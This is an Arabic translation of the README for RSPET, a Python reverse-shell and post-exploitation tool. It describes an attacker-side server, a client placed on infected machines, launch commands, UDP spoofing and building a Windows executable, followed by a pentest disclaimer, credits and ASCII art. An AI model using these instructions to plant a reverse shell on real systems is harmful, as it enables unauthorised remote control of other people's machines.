
RSPET (أداة الصدفة العكسية والاستغلال اللاحق) هي صدفة عكسية مبنية على بايثون ومزودة بوظائف تساعد في سيناريوهات الاستغلال اللاحق.
RSPET (أداة الصدفة العكسية والاستغلال بعد الاختراق) هي صدفة عكسية مبنية على بايثون مزودة بوظائف تساعد في سيناريوهات الاستغلال بعد الاختراق.
إخلاء مسؤولية: يتم تقديم هذا البرنامج لأغراض تعليمية واختبار الاختراق وكدليل على المفهوم. لا يقر المطورون أو يحرضون أو يدعمون بأي شكل من الأشكال الوصول غير المصرح به إلى أجهزة الكمبيوتر أو تعطيل الشبكات.
ملاحظة: تمت إزالة مجلد min. أدى العبء الإضافي للحفاظ على نسختين إلى عدم تلقي min لإصلاحات الأخطاء والتحديثات المهمة. إذا كان هناك اهتمام باستخدام وصيانة نسخة أكثر بساطة وأقل تعقيدًا، فسيتم إنشاء فرع جديد لاستضافتها.
الإصدار الحالي: v0.3.1
تابع: @TheRSPET على تويتر للحصول على التحديثات.
الوثائق: rspet.readthedocs.io
*[1]فكرة XOR بالإضافة إلى الهيكل الأساسي للعميل جاءت من primalsecurity.net لذلك إذا أعجبتك هذه المجموعة من السكريبتات، فمن المحتمل أن تحب ما يفعلونه
*[2]يستخدم تزوير UDP مقابس خام (RAW_SOCKETS) لذلك من أجل استخدامه، يجب تشغيل العميل على نظام تشغيل يدعم المقابس الخام (معظم أنظمة Unix) وبصلاحيات الجذر. أخيرًا، معظم مزودي خدمات الإنترنت لديهم تطبيقات ستقوم إما بإسقاط الحزم المزورة أو إعادة هيكلتها
*[3]مرة أخرى، تحقق من منشور primalsecurity.net's الممتاز حول إنتاج ملف .exe
*[4]الوثائق التفصيلية حول إنشاء الإضافات متاحة في الوثائق عبر الإنترنت!
rspet_server.py موجود على جهاز المهاجم ويعمل لقبول الاتصالاتrspet_client.py موجود على الجهاز (الأجهزة) المصابة وسيبدأ الاتصال وينتظر الإدخال.سيؤدي تنفيذ ./setup.py أثناء وجودك في المجلد الجذر للمشروع إلى إنشاء الشهادات المطلوبة وتثبيت جميع المكونات الضرورية عبر pip.
بالطبع يمكنك تثبيت حزم pip المطلوبة يدويًا عن طريق تنفيذ pip2 install Flask flask-cors.
كما يمكنك إنشاء مجموعة المفاتيح والشهادات الخاصة بك (ما عليك سوى تسميتها server.key و server.crt ووضعها داخل مجلد الخادم).
python rspet_server.py [-c #clients, --ip ipToBind, -p portToBind]
max_connections الافتراضي هو 5 إذا تركت فارغة
واجهة برمجة التطبيقات RESTful:
python rspet_server_api.py [-c #clients, --ip ipToBind, -p portToBind]
العميل:
python rspet_client.py <server_ip> [server_port]
يمكن إجراء العديد من التغييرات لتناسب الاحتياجات الفردية.
كما هو الحال دائمًا، إذا كان لديك أي اقتراح أو تقرير خطأ أو شكوى، فلا تتردد في الاتصال بي.
قائمة التوزيعات التي تحتوي على RSPET
يتبع هذا المشروع دليل أسلوب بايثون من Google مع اختلاف بسيط في استخدام المسافات البيضاء لمحاذاة رموز ":".
هذا المشروع مفتوح للمساهمين. إذا قمت بتنفيذ ميزة جديدة، أو ربما تحسين للكود الحالي، فلا تتردد في فتح طلب سحب. إذا كنت ترغب في اقتراح ميزة جديدة، افتح مشكلة (issue). بالإضافة إلى ذلك، هناك حاجة لمختبرين لتشغيل بعض السيناريوهات القياسية (وربما بعض السيناريوهات الخاصة بهم) لتقليل فرصة تسلل خطأ إلى إصدار جديد. إذا كان هناك أي اهتمام بالاختبار، فسيتم إنشاء فرع beta (حيث سيتم تحميل الكود المراد اختباره) بالإضافة إلى قائمة سيناريوهات. للحصول على دليل كامل حول فرص المساهمة والأدلة، راجع فصل "المساهمة" في الوثائق عبر الإنترنت لـ RSPET
dzervas -- الكود (إعادة تصميم الخادم الموجه للكائنات، تنفيذ نظام الإضافات للخادم، تقارير الأخطاء، إصلاحات الأخطاء)
MIT
i.
.7.
.. :v
c: .x
i.::
:
..i..
#MMMMM
QM AM
9M zM
6M AM
2M 2MX#MM@1.
0M tMMMMMMMMMM;
.X#MMMM ;MMMMMMMMMMMMv
cEMMMMMMMMMU7@MMMMMMMMMMMMM@
.n@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMM@@#$BWWB#@@#$WWWQQQWWWWB#@MM.
MM ;M.
$M EM
WMO$@@@@@@@@@@@@@@@@@@@@@@@@@@@@#OMM
#M cM
QM tM
MM CMO
.MMMM oMMMt
1MO 6MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM iMM
.M1 BM VM ,Mt
1M @M .............................. WM M6
MM .A8OQWWWWWWWWWWWWWWWWWWWWWWWWWWW0Az2 #M
MM MM.
@MMY vMME
UMMMbi i8MMMt
C@MMMMMbt;;i.......i;XQMMMMMMt
;ZMMMMMMMMMMMMMMM@A;.
الكعكة كذبة. لكنها كانت سنة :)